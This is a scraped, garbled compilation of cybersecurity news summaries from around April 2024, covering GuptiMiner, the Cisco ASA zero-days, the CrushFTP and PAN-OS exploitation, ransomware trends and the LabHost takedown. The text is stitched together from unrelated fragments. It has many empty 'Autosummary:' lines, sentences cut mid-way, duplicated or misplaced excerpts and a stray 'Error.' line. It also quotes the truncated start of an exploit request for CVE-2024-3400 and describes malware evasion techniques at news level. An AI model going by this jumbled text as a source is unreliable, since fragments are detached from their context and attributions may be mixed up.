GuptiMiner, known to be active since at least 2018, also makes use of various techniques like anti-VM and anti-debug tricks, code virtualization, dropping the PNG loader during system shutdown events, storing payloads in Windows Registry, and adding a root certificate to Windows" certificate store to make the PNG loader DLLs appear trustworthy. "Autosummary:
"Autosummary:
"Autosummary:
Hopefully, Leicester City Council will manage to turn off its lights and continue to recover from all of the impact of its unfortunate ransomware attack in time, and provide support for any individuals and organisations who have been impacted by the data leak. "More details of and a proof-of-concept exploit for an unauthenticated OS command injection vulnerability (CVE-2024-2389) in Flowmon, Progress Software’s network monitoring/analysis and security solution, have been published. The critical vulnerability has been disclosed and patched by Progress earlier this month. “Currently, we have not received any reports that this vulnerability has been exploited, and we are not aware of any direct impacts on customers,” the company says in an advisory that was last updated on … More
The post PoC for critical Progress Flowmon vulnerability released (CVE-2024-2389) appeared first on Help Net Security.
"Autosummary:
"While the use of zero-day exploits is on the rise, Mandiant’s M-Trends 2024 report reveals a significant improvement in global cybersecurity posture: the global median dwell time – the time attackers remain undetected within a target environment – has reached its lowest point in over a decade. The metrics reported in M-Trends 2024 are based on Mandiant Consulting investigations of targeted attack activity conducted between January 1, 2023 and December 31, 2023. Global cybersecurity shows … More
The post Global attacker median dwell time continues to fall appeared first on Help Net Security.
"Autosummary:
Following this sector were business and professional services (13%), high technology (12%), retail and hospitality (9%), and healthcare (8%). Attacker median dwell time varies by region Organizations in the Asia-Pacific (JAPAC) region experienced the most dramatic decrease, reducing their median dwell time to 9 days, compared to 33 days in 2022. "Autosummary:
"Autosummary:
"Autosummary:
"Regardless of your network equipment provider, now is the time to ensure that the devices are properly patched, logging to a central, secure location, and configured to have strong, multi-factor authentication (MFA)," the company added. "1Kosmos has expanded its offerings for the identity verification and passwordless market with the introduction of a new Credential Service Provider (CSP) managed service based on the privacy-by-design 1Kosmos platform. The 1Kosmos CSP offering enables government agencies to offer residents who are requesting services an elegant, automated process that simultaneously digitally verifies their identity up to certified NIST Identity Assurance Level 2 (IAL2) and then issues a strong, phishing-resistant, multi-factor authentication (MFA) credential, up to … More
The post 1Kosmos CSP enables government agencies to digitally verify resident identity appeared first on Help Net Security.
"Autosummary:
Phone number verification using SIM binding, where a security token (used as proof of identity) is linked to a device trusted by the user and a service provider Social security number (optional) and address verification Once completed, this enrollment process creates a user controlled, privacy-preserving digital wallet that provides a government-grade validated identity for online transactions. "Autosummary:
Because of the sideloading, the DLL runs with the same privileges as the source process – eScan – and it is loaded next time eScan runs, usually after a system restart If a mutex is not present in the system (depends on the version, e.g. Mutex_ONLY_ME_V1 ), the malware searches for services.exe process and injects its next stage into the first one it can find Cleanup is performed, removing the update package GuptiMiner operates its own DNS servers to provide legitimate destination domain addresses of C2 servers through DNS TXT responses. “GuptiMiner is a highly sophisticated threat that uses an interesting infection chain along with a couple of techniques that include performing DNS requests to the attacker’s DNS servers, performing sideloading, extracting payloads from innocent-looking images, signing its payloads with a custom trusted root anchor certification authority, among others.” "Autosummary:
It is used by more than 1,500 companies around the world, including SEGA, KIA, and TDK, Volkswagen, Orange, and Tietoevry. "A state-sponsored threat actor has managed to compromise Cisco Adaptive Security Appliances (ASA) used on government networks across the globe and use two zero-day vulnerabilities (CVE-2024-20353, CVE-2024-20359) to install backdoors on them, Cisco Talos researchers have shared on Wednesday. First confirmed activity observed by a Cisco customer dates to early January 2024 but the actual attacks started in November 2023. “Further, we have identified evidence that suggests this capability was being tested and developed as … More
The post Hackers backdoored Cisco ASA devices via two zero-days (CVE-2024-20353, CVE-2024-20359) appeared first on Help Net Security.
"Autosummary:
Regardless of your network equipment provider, now is the time to ensure that the devices are properly patched, logging to a central, secure location, and configured to have strong, multi-factor authentication (MFA),” Cisco Talos warned. "Autosummary:
Nation-state actors exploited two zero-days in ASA and FTD firewalls to breach government networks Pierluigi Paganini April 24, 2024 April 24, 2024 Nation-state actor UAT4356 has been exploiting two zero-days in ASA and FTD firewalls since November 2023 to breach government networks. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Episode links: Sponsored by: Sonrai’s Cloud Permissions Firewall – A one-click solution to least privilege without disrupting DevOps. "Institutions featured on this list often provide undergraduate and graduate degrees, courses, as well as certificate programs tailored to meet the growing demand for cybersecurity professionals in various industries. Some notable colleges and universities renowned for their cybersecurity programs and courses include: Carnegie Mellon University (USA) Information Networking Institute (INI) The Information Networking Institute (INI) at Carnegie Mellon University (CMU) educates and develops engineers through technical, interdisciplinary master’s degree programs in information networking, security and … More
The post 10 colleges and universities shaping the future of cybersecurity education appeared first on Help Net Security.
"Autosummary:
Program: Master of Science in Cybersecurity Massachusetts Institute of Technology (USA) MIT Department of Electrical Engineering and Computer Science A joint venture between the Schwarzman College of Computing and the School of Engineering, EECS is grounded in three overlapping sub-units: electrical engineering (EE), computer science (CS), and artificial intelligence and decision-making (AI+D). "Q1 saw substantial shifts in activity from some of the most prolific Ransomware-as-a-Service (RaaS) groups, according to GuidePoint Security. RaaS groups attempt to recruit disaffected or displaced affiliates In addition to revealing a nearly 20% year-over-year increase in the number of ransomware victims, the GRIT Q1 2024 Ransomware Report observes major shifts in the behavioral patterns of ransomware groups following law enforcement activity – including the continued targeting of previously “off-limits” organizations and industries, such … More
The post Behavioral patterns of ransomware groups are changing appeared first on Help Net Security.
"Autosummary:
RaaS groups attempt to recruit disaffected or displaced affiliates In addition to revealing a nearly 20% year-over-year increase in the number of ransomware victims, the GRIT Q1 2024 Ransomware Report observes major shifts in the behavioral patterns of ransomware groups following law enforcement activity – including the continued targeting of previously “off-limits” organizations and industries, such as emergency hospitals. "Align announces the inclusion of a new ransomware prevention feature to enhance its Align Guardian Managed Detection and Response offering powered by Adlumin. This innovative solution is designed to detect and halt ransomware in its tracks, safeguarding files from encryption and providing organizations with the peace of mind to focus on their core business operations. The solution demonstrated incredible success in benchmark tests amongst the most notorious ransomware groups, saving on average 99% of files … More
The post Align introduces ransomware prevention feature, powered by Adlumin appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
PS, a PowerShell variant that contains code to spread the spread itself to connected USB devices GammaInfo, a PowerShell-based enumeration script collecting various information from the host GammaSteel, a PowerShell-based malware to exfiltrate files from a victim based on an extension allowlist "Hive0051 rotates infrastructure through synchronized DNS fluxing across multiple channels including Telegram, Telegraph and Filetransfer.io," IBM X-Force researchers said earlier this month, stating it "points to a potential elevation in actor resources and capability devoted to ongoing operations. "Veeam Software announced the acquisition of Coveware, a provider in cyber-extortion incident response. It brings ransomware recovery and first responder capabilities to further strengthen Veeam’s radical resilience solutions for customers. Coveware by Veeam will continue to operate as it does today, providing incident response services to victims of cyber extortion attacks as well as working proactively with enterprise customers on incident response preparedness. Since its founding in 2018, Coveware has helped thousands of cyber extortion … More
The post Veeam acquires Coveware to boost its ransomware protection capabilities appeared first on Help Net Security.
"Autosummary:
Coveware by Veeam Coveware by Veeam will continue to be available to customers as a full-featured offering, including: Fully automated technology that runs across the client’s operational environment to perform forensic triage analysis which assesses any impact, identifies the ransomware (strain, threat actor group, entry point), and helps recover encrypted data from known ransomware groups – though nothing is as safe as secure, clean backups. Veeam will also incorporate elements of Coveware technology into the Veeam Data Platform and through the Veeam Cyber Secure Program, which provides customers with cyber protection and support including pre, during and post-support of cyber incidents, and a $5 million warranty. "A vulnerability (CVE-2024-4040) in enterprise file transfer solution CrushFTP is being exploited by attackers in a targeted fashion, according to Crowdstrike. The vulnerability allows attackers to escape their virtual file system and download system files (i.e., configuration files), but only if the solution’s WebInterface is exposed on the internet. According to Censys, there are currently 9,600+ publicly-exposed CrushFTP hosts (virtual & physical), mostly in North America and Europe. About CVE-2024-4040 CrushFTP sent out notices about … More
The post CrushFTP zero-day exploited by attackers, upgrade immediately! (CVE-2024-4040) appeared first on Help Net Security.
"Autosummary:
The vulnerability allows attackers to escape their virtual file system and download system files (i.e., configuration files), but only if the solution’s WebInterface is exposed on the internet. "Autosummary:
On a broader level, some countries, like the U.S., China, and the UK, have even started investing in their digital defenses, as they do with their military efforts.Moreover, the recovery process from a cyberattack often involves substantial investments in cybersecurity measures, legal fees, and compensations, further contributing to the overall financial impact.Businesses linked to essential services, like those in the finance, medical, and transportation industries, are particularly susceptible to cyberattacks because of their impact on everyday lives. "Autosummary:
GuptiMiner also checks if the system it runs has more than 4 CPU cores and 4GB of RAM to evade sandbox environments, and determines if Wireshark, WinDbg, TCPView, 360 Total Security, Huorong Internet Security, Process Explorer, Process Monitor, and OllyDbg are actively running. "Autosummary:
“Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America,” reads the announcement. "Entrust announced a single-vendor enhanced authentication solution that integrates identity verification (IDV) and identity and access management (IAM) to fight deepfakes, phishing, account takeover (ATO) attacks and other threats. By enhancing Entrust Identity as a Service (IDaaS) platform with Onfido’s AI-powered document and biometric verification, customers will be able to deploy next-level identity authentication before allowing a privileged action or making a high-value transaction. This equips the IDaaS platform with a new layer of hardened … More
The post Entrust protects users against fraud, phishing and other account takeover attacks appeared first on Help Net Security.
"Autosummary:
"For nearly four years and perhaps even longer, Forest Blizzard (aka Fancy Bear, aka APT28) has been using a custom tool that exploits a specific vulnerability in Windows Print Spooler service (CVE-2022-38028). Dubbed GooseEgg, the tool is a launcher application that can spawn other applications with SYSTEM-level permissions, thus helping the hackers to perform remote code execution, install backdoors, steal credentials, and more. “Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities … More
The post Russian hackers’ custom tool exploits old Windows Print Spooler flaw (CVE-2022-38028) appeared first on Help Net Security.
"Autosummary:
“Microsoft has observed Forest Blizzard using GooseEgg as part of post-compromise activities against targets including Ukrainian, Western European, and North American government, non-governmental, education, and transportation sector organizations,” Microsoft threat analysts have shared on Monday. "Autosummary:
Rewards for Justice poster (State Department) Today, the Justice Department also unsealed indictments charging Kazemifar, Salmani, and Harooni for their involvement in a cyber campaign targeting U.S. government agencies, including the U.S. Departments of State and Treasury, and private entities, mainly cleared defense contractors, between 2016 and 2021. "Autosummary:
"Autosummary:
However, the latest operation has extended targeting to the U.S., Nigeria, Pakistan, Ecuador, Germany, Egypt, the U.K., Poland, the Philippines, Norway, Japan, Syria and Turkey. "Autosummary:
More importantly, there is the ad itself: vanity URL, display text, tracking template, final URL. As a user you can protect yourself in various ways: Beware of sponsored results Block ads altogether Recognize scam pages as fake If you want the piece of mind and have all this covered for you, download our Malwarebytes Browser Guard extension available for different browsers. "In this Help Net Security interview, Roy Davis, Manager – Vulnerability Management & Bug Bounty at Zoom, discusses the role bug bounty programs play in identifying security vulnerabilities and facilitating collaboration with researchers. He offers advice to organizations, stressing the importance of clear program policies, swift response times, and competitive bounties to attract and retain top bug hunting talent. Are there specific vulnerabilities or security issues that bug bounty programs are particularly effective in identifying? … More
The post How to optimize your bug bounty programs appeared first on Help Net Security.
"Autosummary:
On the bug bounty program side, the platforms combine vetted, qualified researchers, interactive communication functionality, and management of back-end bug bounty payment transfers.In this Help Net Security interview, Roy Davis, Manager – Vulnerability Management & Bug Bounty at Zoom, discusses the role bug bounty programs play in identifying security vulnerabilities and facilitating collaboration with researchers. To attract top talent, organizations should establish principles to help them guide and improve their program: Adhere to clear and concise program policies that include what types of testing are allowed, details regarding the program’s “Safe Harbor” policy, and a menu of potential bounty payout ranges for specific types of vulnerability reports. "In this Help Net Security video, Sonu Shankar, Chief Strategy Officer at Phosphorus, discusses how Blackjack’s Fuxnet malware should be a wakeup call to industrial operators about the vulnerability of sensor networks and the outsized impact these attacks can have on critical operations.
The post Fuxnet malware: Growing threat to industrial sensors appeared first on Help Net Security.
"Autosummary:
"Cyber resilience is a top priority for global organizations, and understanding threats plays a crucial role in building and maintaining a layered security approach. This Help Net Security round-up presents excerpts from previously recorded videos featuring security experts discussing various cybersecurity aspects and best practices in different domains. Complete videos Robin Berthier, CEO at Network Perception, talks about strategy for cyber resilience. Deepak Goel, CTO at D2iQ, talks about best practices for Kubernetes security in … More
The post How to improve response to emerging cybersecurity threats appeared first on Help Net Security.
"Autosummary:
"Autosummary:
From March 7 to March 15, 2024, CERT-UA engaged in extensive counter-cyberattack operations, which included informing affected enterprises, removing malware, and enhancing security measures. "MITRE has been breached by attackers via two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Ivanti’s Connect Secure VPN devices. The attackers have also managed to move laterally and compromise the company network’s VMware infrastructure, MITRE confirmed late last week. What is known about the breach? The MITRE Corporation is an American not-for-profit organization that manages federally funded research and development centers supporting various US government agencies. “After detecting suspicious activity on [MITRE’s] Networked Experimentation, Research, and … More
The post MITRE breached by nation-state threat actor via Ivanti zero-days appeared first on Help Net Security.
"Autosummary:
The investigation is still ongoing, but MITRE decided to share preliminary findings to help others, as well as specific advice for defenders: Monitor VPN traffic for unusual patterns Look for deviations in user behavior Segment networks to limit lateral movement Use threat intelligence feeds to known malicious IP addresses, domains, or file hashes Use deception environments and honey tokens to detect attacker’s action faster Harden networks with robust access control, regular patch management, vulnerability assessments, etc. "Autosummary:
What do These Findings Mean? The State of Pentesting Survey of 2024, by Pentera, underscores a critical juncture for cybersecurity: As threats continue to evolve, many security solutions fail to mitigate them, requiring CISOs to more consistently validate the security of their infrastructure. Key findings include: The impact of a breach is high: 43% reported unplanned downtime 36% reported data exposure 31% reported financial loss As Board of Directors (BoDs) become more cyber aware, over 50% of CISOs now share their pentesting reports with their BoDs . Security Breaches Persist Despite Investments The 2024 report reveals that enterprises have an average of 53 security solutions, yet they are struggling to maintain the Confidentiality, Integrity, Availability (CIA) triad. "Autosummary:
"Autosummary:
And at the same time, victim organizations that appeared first on ALPHV"s leak site, were re-posted by various other operations such as AvosLocker, LockBit, Ransomhouse, incransom, Haron, cactus, etc.The Snatch group for example demonstrates re-victimization activity by consistently re-posting victims from other Cy-X operations such as from AstroTeam, Meow, Sabbath, Karma Leaks, cactus, Quantum, Egregor and Marketo. If we continue studying the graph, we see another cluster, ALPHV"s, where we see that ALPHV re-posted victims from MONTI, 8Base and Qilin (in the latter the victim organization was posted in the same day at both leak sites, ALPHV and Qilin).In short, your cyber practices, your digital footprint, the value your organization"s data has to you, the time a threat actor has access to your environment, the security controls you might have in place to increase the "noisiness" of data exfiltration; are all variables that impact the attractiveness of your organization to the opportunistic threat actors out there in cyber space.On the other hand, if we do follow the victim count patterns of the last years (lower numbers in the beginning of the year, increasing throughout the year), which would have the opposite effect, providing us with an ever-growing victim count once more. Note: This informative piece has been expertly crafted and contributed by Diana Selck-PaulssonDiana Selck-Paulsson, Lead Security Researcher, Orange Cyberdefense and Wicus RossWicus Ross, Senior Security Researcher, Orange Cyberdefense.Here, we collected actions such as announcements on kicking off international taskforces to combat Ransomware, LE tricking threat actors in providing them decryption keys, seizing infrastructure, infiltrating cybercrime markets, etc.This can greatly undermine "the trust" within the Ransomware-as-a-Service (RaaS) ecosystem, there could be a short-term decrease in the number of victims as affiliates and other actors assess their risks. Re-victimization of Cy-X victims in form of desperation or affiliate crossovers We know by now that the cybercrime ecosystem is a complex one, including many different type of actors, roles and actions. "Autosummary:
Windows DOS-to-NT flaws exploited to achieve unprivileged rootkit-like capabilities Pierluigi Paganini April 22, 2024 April 22, 2024 Researcher demonstrated how to exploit vulnerabilities in the Windows DOS-to-NT path conversion process to achieve rootkit-like capabilities.“I discovered how a malicious actor—without admin privileges—could hide files and processes, hide files in archives, affect prefetch file analysis, make Task Manager and Process Explorer users think a malware file was a verified executable published by Microsoft, disable Process Explorer with a denial of service (DoS) vulnerability, and more.” A user-space rootkit aims to intercept user-space API calls, execute the original function, filter out malicious data, and return altered information to the caller. "Autosummary:
"In these hours, the SYNLAB task force is being analyzed for every single portion of the IT infrastructure, including backup systems, in order to restore the systems safely as soon as possible," reads the status update. "Autosummary:
In our tests, we were able to upload files that would get uploaded to GitLab"s CDN but look like these existed with GitLab repos of popular open source projects like Inkscape and Wireshark: https://gitlab[.]com/inkscape/inkscape/uploads/edfdbc997689255568a7c81db3f3dc51/InkScape-2024-Latest.exe https://gitlab[.]com/wireshark/wireshark/uploads/b4162053fbb4dc6ee4f673c532009e16/WireShark-v4.2.4-stable-release.exe The file used in our test is a benign JPG image, renamed to .exe "Autosummary:
"Autosummary:
Error. "Autosummary:
"Autosummary:
"Autosummary:
The APT28 group (aka Forest Blizzard, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "Autosummary:
Ransomware attack vectors Coveware From those that have been determined, remote access and vulnerability exploitation play the largest role, with the CVE-2023-20269, CVE-2023-4966, and CVE-2024-1708-9 flaws being the more widely exploited in Q1 by ransomware operators. "Autosummary:
Fake UsenetClub site Source: BleepingComputer Clicking on the "Download & Install" button will download a CryptVPN.zip file from the site that, when extracted, contains a Windows shortcut called "CLICK-HERE-TO-INSTALL". "Autosummary:
A joint advisory published by CISA, the FBI, Europol, and the Netherlands’ National Cyber Security Centre (NCSC-NL) revealed that since early 2023, Akira ransomware operators received $42 million in ransom payments from more than 250 victims worldwide. "Autosummary:
"Autosummary:
"Autosummary:
The hospital ensured continuity of operations in emergency care, internal medicine, surgery, obstetrics, geriatrics, pediatrics, psychiatry, home hospitalization, and rehabilitation.A French hospital was forced to reschedule procedures after cyberattack Pierluigi Paganini April 20, 2024 April 20, 2024 A French hospital was forced to return to pen and paper and postpone medical treatments after a cyber attack. "Autosummary:
GitHub bug still dropping malware pic.twitter.com/s165zOAsoI — herrcore (@herrcore) March 27, 2024 As part of our research into this bug, BleepingComputer could only find one other repo, httprouter, abused to distribute malware in this way, and it was the same "Cheater.Pro.1.6.0.zip" as seen in Microsoft"s URLs. "Autosummary:
Critical CrushFTP zero-day exploited in attacks in the wild Pierluigi Paganini April 20, 2024 April 20, 2024 Threat actors exploited a critical zero-day vulnerability in the CrushFTP enterprise in targeted attacks, Crowdstrike experts warn. "Autosummary:
Redline is a powerful information-stealing malware capable of harvesting sensitive information from infected computers, including passwords, cookies, autofill information, and cryptocurrency wallet information. "Autosummary:
CR4T ("CR4T.pdb") is a C/C++-based memory-only implant that grants attackers access to a console for command line execution on the infected machine, performs file operations, and uploads and downloads files after contacting the C2 server. "Autosummary:
United Nations Development Programme (UNDP) investigates data breach Pierluigi Paganini April 19, 2024 April 19, 2024 The United Nations Development Programme (UNDP) has initiated an investigation into an alleged ransomware attack and the subsequent theft of data. "The CryptoChameleon phishing kit is being leveraged by vishing attackers looking to trick LastPass users into sharing their master password. “Initially, we learned of a new parked domain (help-lastpass[.]com) and immediately marked the website for monitoring should it go live and start serving a phishing site intended to imitate our login page or something similar. Once we identified that this site went active and was being used in a phishing campaign against our customers, we … More
The post LastPass users targeted by vishing attackers appeared first on Help Net Security.
"Autosummary:
According to Lookout researchers, the phishing kit is capable of replicating login pages of popular cryptocurrency enxchanges and other services (Binance, Coinbase, Gemini, Kraken, trezor, etc.) and email, password management, and single sign-on (SSO) services such as Gmail, Outlook, iCloud, AOL, LastPass, Okta, and others. "Autosummary:
"Away from the complex infrastructure of modern ransomware, junk-gun ransomware allows criminals to get in on the action cheaply, easily, and independently," Sophos said, describing it as a "relatively new phenomenon" that further lowers the cost of entry. "Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia," cybersecurity agencies from the Netherlands and the U.S., along with Europol"s European Cybercrime Centre (EC3), said in a joint alert. "More organizations hit by ransomware gangs are starting to realize that it doesn’t pay to pay up: “In Q1 2024, the proportion of victims that chose to pay touched a new record low of 28%,” ransomware incident response firm Coveware has found. Victim organizations are increasingly able to withstand an encryption attack and restore operations without the need for a decryption key, they said, and the stolen data is often leaked or traded even after … More
The post Ransomware in Q1 2024: Frequency, size of payments trending downwards, SMBs beware! appeared first on Help Net Security.
"Autosummary:
"Autosummary:
To celebrate the launch, the threat actor released four private decryption keys that can be used to decrypt files in older attacks, as well as internal information stolen from Cisco in a 2022 attack and passwords for the leaked source code for Gwent, Witcher 3, and Red Engine stolen from CD Projekt in 2021. "Autosummary:
"Autosummary:
UNDP entry on 8Base"s leak site (BleepingComputer) The files they temporarily leaked via a now-expired link allegedly include "a huge amount of confidential information," personal data, accounting data, certificates, employment contracts, confidentiality agreements, invoices, receipts, and more. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @BleepinComputer, @Ionut_Ilascu, @serghei, @fwosar, @LawrenceAbrams, @malwrhunterteam, @demonslay335, @Seifreed, @pcrisk, @SophosXOps, @jgreigj, @JessicaHrdcstle, @3xp0rtblog, @AShukuhi, and @vxunderground. A Sophos X-Ops investigation finds that a wave of crude, cheap ransomware could spell trouble for small businesses and individuals – but also provide insights into threat actor career development and the wider threat landscape April 18th 2024 According to a joint advisory from the FBI, CISA, Europol"s European Cybercrime Centre (EC3), and the Netherlands" National Cyber Security Centre (NCSC-NL), the Akira ransomware operation has breached the networks of over 250 organizations and raked in roughly $42 million in ransom payments. "Autosummary:
Exploited in targeted attacks Cybersecurity company CrowdStrike also confirmed the vulnerability (which has yet to get a CVE ID assigned) in an intelligence report with more information on the attackers" tactics, techniques, and objectives (TTPs). "Autosummary:
MITRE revealed that nation-state actors breached its systems via Ivanti zero-days Pierluigi Paganini April 19, 2024 April 19, 2024 The MITRE Corporation revealed that a nation-state actor compromised its systems in January 2024 by exploiting Ivanti VPN zero-days. "Autosummary:
"Autosummary:
"Since June 2023, Sophos X-Ops has discovered 19 junk gun ransomware variants — cheap, independently produced, and crudely constructed — on the dark web. The developers of these junk gun variants are attempting to disrupt the traditional affiliate-based ransomware-as-a-service (RaaS) model that has dominated the ransomware racket for nearly a decade. Instead of selling or buying ransomware to or as an affiliate, attackers create and sell unsophisticated variants for a one-time cost—which other attackers sometimes … More
The post Cheap ransomware for sale on dark web marketplaces is changing the way hackers operate appeared first on Help Net Security.
"Autosummary:
“Over the past two months, however, some of the biggest players in the ransomware ecosystem have disappeared or shut down, and, in the past, we’ve also seen ransomware affiliates vent their anger over the profit-sharing scheme of RaaS. Nothing within the cybercrime world stays static forever, and these cheap versions of off-the-shelf ransomware may be the next evolution in the ransomware ecosystem—especially for lower-skilled cyber attackers simply looking to make a profit rather than a name for themselves,” Budd concluded. "Autosummary:
A Spring Expression Language (SpEL) injection vulnerability in PUT /api/v1/events/subscriptions (fixed in version 1.2.4) (CVSS score: 8.8) - A Spring Expression Language (SpEL) injection vulnerability in PUT /api/v1/events/subscriptions (fixed in version 1.2.4) CVE-2024-28848 (CVSS score: 8.8) -A SpEL injection vulnerability in GET /api/v1/events/subscriptions/validation/condition/<expr> (fixed in version 1.2.4) (CVSS score: 8.8) - "Autosummary:
The recent international law enforcement operation coordinated by Europol started roughly a year ago and involved police forces and special investigators in 19 countries, as well as partners from the private sector like Microsoft, Trend Micro, Chainalysis, Intel 471, and The Shadowserver Foundation. "Autosummary:
During the investigation and on action day, law enforcement seized or froze € 4,700,000 in bank accounts, € 1,515,000 in cryptocurrencies, € 106,000 in cash and € 2,600,000 in real estate assets, which amounts to roughly $ 9.5 Million in total. So, for example, the first-time investor would deposit € 50 and receive a pay-out doubling their money soon after.Indeed, the U.S., Canada, and the soon-to-be regulated markets of the European Union are spearheading this revolution with unprecedented swiftness. "The newest version of Ivanti Avalanche – the company’s enterprise mobile device management (MDM) solution – carries fixes for 27 vulnerabilities, two of which (CVE-2024-29204, CVE-2024-24996) are critical and may allow a remote unauthenticated attacker to execute arbitrary commands on the underlying Windows system. “We are not aware of any customers being exploited by these vulnerabilities prior to public disclosure,” the company said on Wednesday. CVE-2024-29204 and CVE-2024-24996 Both critical vulnerabilities are heap overflow bugs: … More
The post Ivanti patches critical Avalanche flaw exploitable via a simple message (CVE-2024-29204) appeared first on Help Net Security.
"Autosummary:
"Law enforcement from 19 countries severely disrupted one of the world’s largest phishing-as-a-service platform, known as LabHost. This year-long operation, coordinated at the international level by Europol, resulted in the compromise of LabHost’s infrastructure. International investigation disrupts phishing-as-a-service platform LabHost Between Sunday 14 April and Wednesday 17 April a total of 70 addresses were searched across the world, resulting in the arrest of 37 suspects. This includes the arrest of 4 individuals in the United … More
The post Authorities take down LabHost, phishing-as-a-service platform appeared first on Help Net Security.
"Autosummary:
LabHost: Cybercriminals’ one-stop platform for phishing kits and engagement tools Cybercrime-as-a-service has become a rapidly growing business model in the criminal landscape whereby threat actors rent or sell tools, expertise, or services to other cybercriminals to commit their attacks. "Autosummary:
With full automation and orchestration, a Zerto failover can achieve benefits like these: Thousands of VMs with an RTO of minutes Full re-IP of each VM, if required Restoring directly onto production-grade storage of your choice with no additional migrations required (such as Storage vMotion) Restoring directly back onto production-grade compute without any further steps such as vMotion This type of recovery is ideal for cyber recovery because large-scale recoveries can be difficult to achieve with backup tools that are not designed for recovery at scale. Real-time, in-line encryption detection helps identify anomalous activity, limit blast radius, and provide the earliest warning signal that an attack may be occurring.You can drill down to see the exact disk the anomalous activity is being generated from, allowing you to quickly identify infected machines, limit blast radius, and create a timeline of events to aid in investigations and forensics post-recovery, as shown in this image. "Autosummary:
Secondly, SoumniBot misrepresents the archived manifest file size, providing a value that exceeds the actual figure, as a result of which the "uncompressed" file is directly copied, with the manifest parser ignoring the rest of the "overlay" data that takes up the rest of the available space. "Autosummary:
Example: Details of an .eml file static analysis All content within EMAIL files is extracted and made available through static analysis in the sandbox, allowing users to view details about it even without accessing the VM itself. Example: ZIP file structure displayed in the static analysis window In ANY.RUN, users can submit files for new analysis directly from archived files from the static discovery window. All embedded files, including images, scripts, and executable files, are also accessible for further analysis. Analyzing Suspicious Office Documents Microsoft Office documents, such as Word, Excel, and PowerPoint ones, are one of the leading security risks in both corporate and personal settings.It gives you a real-time overview of the network traffic, registry activities, and processes occurring during malware execution, highlighting malicious behavior and the tactics, techniques, and procedures (TTPs). "Autosummary:
Described as one of the largest Phishing-as-a-Service (PhaaS) providers, LabHost offered phishing pages targeting banks, high-profile organizations, and other service providers located primarily in Canada, the U.S., and the U.K. As part of the operation, codenamed Nebulae, two LabHost users from Melbourne and Adelaide were arrested on April 17, with three others arrested and charged with drug-related offenses. "Autosummary:
In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine,including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe. The Sandworm group (aka BlackEnergy, UAC-0082, Iron Viking, Voodoo Bear, and TeleBots) has been active since 2000, it operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST). "Autosummary:
"Autosummary:
The cybercriminal group RansomHub published a portion of what it claims to be the many millions of patient records it stole in the attack on the dark web, including medical information, insurance records, and billing details. "Autosummary:
"The infection iterates through a list of the document candidates to infect and uses an innovative method to check the document infection marker to avoid multiple infection processes – the function checks the document creation metadata, adds the creation times, and checks the value of the sum," Svajcer said. "Autosummary:
"Autosummary:
Law enforcement operation dismantled phishing-as-a-service platform LabHost Pierluigi Paganini April 18, 2024 April 18, 2024 An international law enforcement operation led to the disruption of the prominent phishing-as-a-service platform LabHost. "Autosummary:
" Emergency, medicine, surgery, obstetrics, geriatrics, pediatrics, psychiatry, home hospitalization, and rehabilitation units continue to operate. "Autosummary:
"Autosummary:
Other brands impersonated by legitimate-looking Google ads include Keepass, Home Depot, Amazon, eBay, and even Google"s own property, YouTube. "Autosummary:
The UK’s Metropolitan Police (“The Met”), which spearheaded the operation, says it has already contacted the criminals who used the site: Shortly after the platform was disrupted, 800 users received a message telling them we know who they are and what they’ve been doing. "Autosummary:
In the attacks analyzed by BlackBarry, threat actors used a typosquatting technique, they used a malicious URL “advanced-ip-sccanner[.]com” masquerading as the legitimate website “advanced-ip-scanner[.]com”, which is a free online scanner. "Autosummary:
According to an internal memo, a network outage took down Frontier"s wholesale sites on Tuesday morning at around 7:30 AM ET, as well as the following applications and platforms: Virtual Front Office (VFO) Local (LSR/ISP) Module Virtual Front Office (VFO) Access (ASR) Module Virtual Front Office (VFO) Trouble Administration (TA) "Client Security Officer Unisys | USA | Remote – View job details The Client Security Officer (CSO) is part of Unisys account management team servicing its clients as cybersecurity representative alongside the Client Executive and the Client Delivery Executive. Cybersecurity Engineer Fujitsu | Singapore | Hybrid – View job details As a member of the Fujitsu Security Team, you will implement security solutions for customers to address cyber threats and potential vulnerabilities. This person will … More
The post Cybersecurity jobs available right now: April 17, 2024 appeared first on Help Net Security.
"Autosummary:
Manager, IT Security Operations Dalhousie University | Canada | On-site – View job details Reporting to the Associate Director of Engineering Services, the Manager, Security Operations is responsible for the projects and activities to address new and emerging requirements for security operations, including network security, application security, end user device security and Identity and Access management. "Autosummary:
Since it"s out there now this is what I caught in wild CVE-2024-3400 GET /global-protect/login.esp HTTP/1.1 Host: X User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Accept-Encoding: gzip, deflate, br… — Justin Elze (@HackingLZ) April 16, 2024 This week, US CISA added the vulnerability CVE-2024-3400 to its Known Exploited Vulnerabilities (KEV) catalog, ordering U.S. federal agencies to address it by April 19th. "While it initially seemed that protecting Palo Alto Network firewalls from attacks leveraging CVE-2024-3400 would be possible by disabling the devices’ telemetry, it has now been confirmed that this mitigation is ineffectual. “Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability,” Palo Alto Networks noted on Tuesday, and said they are aware of an “increasing number of attacks that leverage the exploitation of this … More
The post Palo Alto firewalls: Public exploits, rising attacks, ineffective mitigation appeared first on Help Net Security.
"Autosummary:
"Autosummary:
